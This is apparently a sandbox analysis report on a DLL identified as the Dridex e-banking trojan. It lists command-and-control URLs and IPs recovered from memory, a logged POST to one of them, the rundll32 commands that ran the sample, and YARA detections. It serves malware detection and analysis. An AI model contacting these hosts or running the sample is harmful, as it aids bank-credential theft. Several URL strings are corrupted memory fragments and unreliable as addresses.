                      Source: loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/b)
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.739023483.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.594551032.0000000001673000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.628735432.0000000001672000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.453087889.0000000001672000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.708744109.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.554969204.0000000001672000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.730453084.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/k)
                      Source: loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l
                      Source: loaddll32.exe, 00000000.00000003.747478637.000000000166F000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/lB(
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.747478637.000000000166F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.600682349.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.439196608.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.618224210.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.586087040.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/oft
                      Source: loaddll32.exe, 00000000.00000003.680591172.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/p
                      Source: loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/t)
                      Source: loaddll32.exe, 00000000.00000003.738944864.00000000016DB000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/u
                      Source: loaddll32.exe, 00000000.00000003.494287191.000000000166F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.641039934.00000000016DB000.00000004.00000001.sdmpString found in binary or memory: https://18192.46.210.220/
                      Source: loaddll32.exe, 00000000.00000003.569464960.00000000016DB000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.771944761.00000000056FB000.00000004.00000001.sdmpString found in binary or memory: https://182.46.210.220/
                      Source: loaddll32.exe, 00000000.00000003.641066942.0000000001675000.00000004.00000001.sdmpString found in binary or memory: https://1845.77.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/&
                      Source: loaddll32.exe, 00000000.00000003.392156959.0000000001673000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/4
                      Source: loaddll32.exe, 00000000.00000003.392156959.0000000001673000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/g
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.739023483.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.708744109.0000000001676000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.547755261.00000000034C9000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/
                      Source: loaddll32.exe, 00000000.00000003.742305887.000000000166F000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/)
                      Source: loaddll32.exe, 00000000.00000003.680591172.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/0
                      Source: loaddll32.exe, 00000000.00000003.658533321.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/3
                      Source: loaddll32.exe, 00000000.00000003.708744109.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4
                      Source: loaddll32.exe, 00000000.00000003.594551032.0000000001673000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.756126236.000000000166D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.519076756.0000000001673000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.742305887.000000000166F000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/8D
                      Source: loaddll32.exe, 00000000.00000003.418080162.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/B
                      Source: loaddll32.exe, 00000000.00000003.742305887.000000000166F000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/H3
                      Source: loaddll32.exe, 00000000.00000003.586087040.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/O
                      Source: loaddll32.exe, 00000000.00000003.594551032.0000000001673000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/Ps%
                      Source: loaddll32.exe, 00000000.00000003.586087040.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/S
                      Source: loaddll32.exe, 00000000.00000003.703443485.0000000001675000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/V
                      Source: loaddll32.exe, 00000000.00000003.676183514.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/Y
                      Source: loaddll32.exe, 00000000.00000003.629814185.0000000001673000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/fW
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/i#
                      Source: loaddll32.exe, 00000000.00000003.594551032.0000000001673000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ll
                      Source: rundll32.exe, 00000004.00000003.741865046.00000000034C9000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/o)
                      Source: loaddll32.exe, 00000000.00000003.708727054.00000000016DB000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/p
                      Source: loaddll32.exe, 00000000.00000003.750936613.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/rS
                      Source: loaddll32.exe, 00000000.00000003.395037799.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.400716165.0000000001673000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.628735432.0000000001672000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.703443485.0000000001675000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.418080162.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.494287191.000000000166F000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/soft
                      Source: loaddll32.exe, 00000000.00000003.444519765.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/y#
                      Source: rundll32.exe, 00000004.00000003.612201176.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://19.77.0.96:6891/
                      Source: rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.390529394.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/
                      Source: loaddll32.exe, 00000000.00000003.436575966.000000000166B000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/%Ev
                      Source: loaddll32.exe, 00000000.00000003.453087889.0000000001672000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/)
                      Source: rundll32.exe, 00000004.00000003.533230659.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/.
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/4
                      Source: rundll32.exe, 00000004.00000003.541565391.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/7.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/?
                      Source: loaddll32.exe, 00000000.00000003.747478637.000000000166F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/C
                      Source: loaddll32.exe, 00000000.00000003.453087889.0000000001672000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/HL
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/J
                      Source: loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Q
                      Source: loaddll32.exe, 00000000.00000003.439196608.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/TL
                      Source: loaddll32.exe, 00000000.00000003.497146679.000000000166F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/X
                      Source: loaddll32.exe, 00000000.00000003.600682349.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.439196608.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dll
                      Source: loaddll32.exe, 00000000.00000003.453087889.0000000001672000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dllc
                      Source: loaddll32.exe, 00000000.00000003.530192281.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dllltbac
                      Source: loaddll32.exe, 00000000.00000003.577873723.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dllm
                      Source: loaddll32.exe, 00000000.00000003.521947137.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/coro8
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/g
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/hL
                      Source: loaddll32.exe, 00000000.00000003.395037799.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/i
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/n
                      Source: rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.541565391.00000000056FE000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.581920217.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/ography
                      Source: loaddll32.exe, 00000000.00000003.713747345.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/r
                      Source: loaddll32.exe, 00000000.00000003.449677667.00000000016DB000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.541565391.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://193.244.140.214:808/
                      Source: loaddll32.exe, 00000000.00000003.626454578.00000000016DB000.00000004.00000001.sdmpString found in binary or memory: https://195.56.219.47:8116/
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.395037799.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/
                      Source: loaddll32.exe, 00000000.00000003.395037799.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96//Fm
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/F7
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.476592616.0000000001676000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.547755261.00000000034C9000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.574895771.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/)
                      Source: rundll32.exe, 00000004.00000003.541565391.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.
                      Source: rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000002.769348582.000000000166E000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891//
                      Source: loaddll32.exe, 00000000.00000003.719882602.0000000001675000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/08/
                      Source: loaddll32.exe, 00000000.00000003.399573978.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/08/Y
                      Source: loaddll32.exe, 00000000.00000003.408181456.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/08/l
                      Source: loaddll32.exe, 00000000.00000003.628735432.0000000001672000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.418080162.000000000166E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.612201176.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/14
                      Source: loaddll32.exe, 00000000.00000003.476592616.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/14H
                      Source: loaddll32.exe, 00000000.00000003.408181456.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/4
                      Source: loaddll32.exe, 00000000.00000003.574895771.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/6/
                      Source: loaddll32.exe, 00000000.00000003.628735432.0000000001672000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/65
                      Source: loaddll32.exe, 00000000.00000003.497146679.000000000166F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/8
                      Source: rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.458615929.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Microsoft
                      Source: loaddll32.exe, 00000000.00000003.431000649.000000000166D000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/R
                      Source: loaddll32.exe, 00000000.00000003.569505666.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/S
                      Source: loaddll32.exe, 00000000.00000003.519010998.00000000016DB000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/X
                      Source: loaddll32.exe, 00000000.00000003.574895771.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Y#
                      Source: rundll32.exe, 00000004.00000003.541565391.00000000056FE000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.771944761.00000000056FB000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/graphy
                      Source: loaddll32.exe, 00000000.00000003.604985676.0000000001672000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/h.dll
                      Source: rundll32.exe, 00000004.00000003.612166801.00000000034C9000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/o)
                      Source: loaddll32.exe, 00000000.00000002.769348582.000000000166E000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/p
                      Source: loaddll32.exe, 00000000.00000003.476592616.0000000001676000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.612166801.00000000034C9000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/r
                      Source: loaddll32.exe, 00000000.00000003.574895771.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/ra
                      Source: rundll32.exe, 00000004.00000003.612201176.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/v
                      Source: loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://453.244.140.214:808/
                      Source: loaddll32.exe, 00000000.00000003.586077792.00000000016DB000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.458615929.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://455.56.219.47:8116/
                      Source: loaddll32.exe, 00000000.00000003.680591172.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://di3.244.140.214:808/
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBC39F9 InternetReadFile,
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:49748 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:49753 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 5.3.rundll32.exe.cfdb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.eedb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.rundll32.exe.4cbdb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.170db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.rundll32.exe.4cbdb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6eb90000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4ccdb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6eb90000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.cfdb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.eedb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.170db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4ccdb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.326244435.0000000004CB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323665839.0000000000ED0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.771060361.000000006EB91000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.370833938.0000000004CA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.772113565.000000006EB91000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.362350456.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.373914739.00000000016F0000.00000040.00000001.sdmp, type: MEMORY
                      Detected Dridex e-Banking trojanShow sources
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EB951A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: SecuriteInfo.com.Variant.Razy.980776.28061.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA67C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA8AB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB26B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB1EB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA8EF0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB62F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBAF6E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EB96AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA96D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB3EC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBBFA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB0220
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBBD620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EB9CA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBBFA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA9E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBAA660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB7660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB2E60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB1240
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EB91784
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBAE3F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA83C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA7FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB7FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB1730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB9B10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB3B00
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB5CB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBAE0A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB4CA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB50A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBBDCA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA98DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBAA0D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA88C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA8CC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBAD030
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB1020
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EB9F9A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBAD980
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBBD180
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB89F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBB71F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBAFDD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA7564
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_04E6E768
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_04E6E768
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_04E6E4FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_04E6E4FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_04E6E8F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_04E6E8F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_04E6E768
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_04E6E768
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_04E6E4FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_04E6E4FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_04E6E8F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_04E6E8F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6EBDE210
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBA22A0 NtDelayExecution,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EBBBE30 NtClose,
                      Source: SecuriteInfo.com.Variant.Razy.980776.28061.dllVirustotal: Detection: 7%
                      Source: SecuriteInfo.com.Variant.Razy.980776.28061.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Bluewing
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Masterjust
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Bluewing
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Masterjust
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: classification engineClassification label: mal84.bank.troj.evad.winDLL@11/2@0/4
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Bluewing
                      Source: SecuriteInfo.com.Variant.Razy.980776.28061.5528Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: SecuriteInfo.com.Variant.Razy.980776.28061.dllStatic file information: File size 1375232 > 1048576
                      Source: SecuriteInfo.com.Variant.Razy.980776.28061.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: SecuriteInfo.com.Variant.Razy.980776.28061.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.771396615.000000006EC57000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.772256602.000000006EC57000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.28061.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_017AC77C push eax; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
